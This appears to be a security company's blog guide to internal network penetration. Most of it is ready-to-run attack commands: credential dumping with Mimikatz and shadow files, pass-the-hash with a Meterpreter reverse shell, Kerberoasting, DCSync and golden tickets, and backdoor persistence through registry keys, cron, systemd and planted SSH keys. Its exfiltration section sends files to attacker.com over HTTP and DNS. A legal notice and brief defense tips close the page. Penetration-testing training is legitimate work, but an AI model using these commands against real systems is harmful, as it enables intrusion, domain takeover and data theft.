Internal Network Penetration

Published: December 1, 2025 Reading Time: 22 mins
💻 Compromised Initial Access Internal Network 🖥️ Workstation 💾 File Server 🏛️ DC 🗄️ Database 🎯 Target

Internal network penetration involves exploiting vulnerabilities and misconfigurations within an organization's private network after gaining initial access. This guide covers advanced techniques for navigating, escalating privileges, and maintaining persistence in internal environments.

💡

Understanding Internal Network Attacks

Once attackers breach the perimeter, internal networks often provide rich targets with weaker security controls. Understanding internal penetration techniques is crucial for both offensive and defensive security operations.

Initial Enumeration

Network Enumeration

Network Discovery

# Discover live hosts
nmap -sn 192.168.1.0/24
arp-scan -l
netdiscover -r 192.168.1.0/24

# Windows enumeration
net view /all
net view /domain
net group "Domain Computers" /domain

# PowerShell network scan
1..254 | ForEach-Object {Test-Connection -ComputerName "192.168.1.$_" -Count 1 -Quiet}

# Linux network enumeration
for i in {1..254}; do ping -c 1 192.168.1.$i & done
ip neigh show

Service Enumeration

# Comprehensive port scan
nmap -p- -sV -sC -A 192.168.1.0/24 -oA internal_scan

# SMB enumeration
enum4linux -a 192.168.1.10
smbclient -L //192.168.1.10 -N
crackmapexec smb 192.168.1.0/24

# LDAP enumeration
ldapsearch -x -h 192.168.1.10 -s base namingcontexts

# SNMP enumeration
snmpwalk -v2c -c public 192.168.1.10
onesixtyone -c community.txt 192.168.1.0/24

Credential Access

Credential Dumping

# Mimikatz - Windows credential dumping
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
lsadump::sam
lsadump::secrets

# Linux credential harvesting
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > hashes.txt
john hashes.txt

# Browser credential extraction
# Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
# Firefox: %APPDATA%\Mozilla\Firefox\Profiles\

Pass-the-Hash Attack

# Using CrackMapExec
crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Using Impacket
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 [email protected]

# Using Metasploit
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
Credential Access Techniques

Lateral Movement

Remote Execution Techniques

# PsExec
PsExec.exe \\192.168.1.10 -u admin -p password cmd.exe

# WMI (Windows Management Instrumentation)
wmic /node:192.168.1.10 /user:admin /password:pass process call create "cmd.exe"

# PowerShell Remoting
Enter-PSSession -ComputerName 192.168.1.10 -Credential (Get-Credential)
Invoke-Command -ComputerName 192.168.1.10 -ScriptBlock {whoami}

# SSH (Linux)
ssh [email protected]
ssh -i private_key [email protected]

# RDP
rdesktop 192.168.1.10
xfreerdp /v:192.168.1.10 /u:admin /p:password

Token Impersonation

# Meterpreter token manipulation
use incognito
list_tokens -u
impersonate_token DOMAIN\\Administrator

# PowerShell token stealing
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "DOMAIN\admin"

Domain Compromise

Active Directory Attacks

# Bloodhound - AD visualization
bloodhound-python -d domain.local -u user -p password -ns 192.168.1.10 -c all

# Kerberoasting
GetUserSPNs.py -request -dc-ip 192.168.1.10 domain.local/user:password
Invoke-Kerberoast -OutputFormat Hashcat

# AS-REP Roasting
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt

# DCSync attack
mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:domain.local"
secretsdump.py domain.local/[email protected] -just-dc

Golden Ticket Attack

# Create golden ticket with Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /id:500

# Inject and use the ticket
kerberos::ptt ticket.kirbi

# Verify access
dir \\dc01\c$
Active Directory Attacks

Persistence Mechanisms

Windows Persistence

# Registry Run Keys
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

# Scheduled Tasks
schtasks /create /tn "WindowsUpdate" /tr "C:\backdoor.exe" /sc onlogon /ru System

# WMI Event Subscription
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name="BadFilter";EventNamespace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent"}

# Service Installation
sc create BackdoorService binPath= "C:\backdoor.exe" start= auto
net start BackdoorService

Linux Persistence

# Cron jobs
(crontab -l; echo "@reboot /tmp/backdoor.sh") | crontab -
echo "* * * * * /tmp/backdoor.sh" >> /etc/crontab

# SSH keys
mkdir -p ~/.ssh
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Systemd service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
[Service]
ExecStart=/tmp/backdoor.sh
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service

Pivoting and Tunneling

Network Pivoting

# SSH Dynamic Port Forwarding (SOCKS)
ssh -D 9050 user@compromised-host
proxychains nmap -sT 10.10.10.0/24

# SSH Local Port Forwarding
ssh -L 8080:internal-server:80 user@compromised-host

# SSH Remote Port Forwarding
ssh -R 8080:localhost:80 user@attacker-server

# Metasploit autoroute
run autoroute -s 10.10.10.0/24
use auxiliary/server/socks_proxy
set SRVPORT 1080
run

Data Exfiltration

# Find sensitive files
# Windows
dir /s /b C:\ | findstr /i "password credential secret"

# Linux
find / -name "*password*" -o -name "*credential*" 2>/dev/null

# Exfiltration via HTTP
curl -F "[email protected]" http://attacker.com/upload

# Exfiltration via DNS
# Split file and send via DNS queries
for chunk in $(split -b 63 data.txt); do nslookup $chunk.attacker.com; done

# Compressed exfiltration
tar czf - /path/to/data | base64 | curl -d @- http://attacker.com/receive
⚠️

Legal and Ethical Notice

Internal network penetration testing must only be performed with explicit written authorization. Unauthorized access to networks and systems is illegal and unethical.

HackHub Professional Services

🚀

Expert Internal Network Penetration Testing

The HackHub team specializes in comprehensive internal network security assessments with over 10 years of experience. We simulate real-world attack scenarios to identify and remediate vulnerabilities in your internal infrastructure, Active Directory environments, and critical systems.

Our Services Include:

  • Internal Network Penetration Testing
  • Active Directory Security Assessment
  • Red Team Operations
  • Assumed Breach Scenarios

Contact [email protected] for professional security services.

Defense Recommendations

  • Network Segmentation: Implement proper VLANs and access controls
  • Least Privilege: Limit user and service account permissions
  • MFA: Implement multi-factor authentication for all accounts
  • Monitoring: Deploy EDR/XDR solutions and SIEM
  • Patch Management: Keep systems and software up to date
  • Credential Hygiene: Implement strong password policies and credential rotation

Conclusion

Internal network penetration testing is a critical component of comprehensive security assessments. Understanding these techniques helps both offensive security professionals conduct thorough testing and defensive teams implement effective controls. Regular testing and continuous monitoring are essential for maintaining security in modern enterprise environments.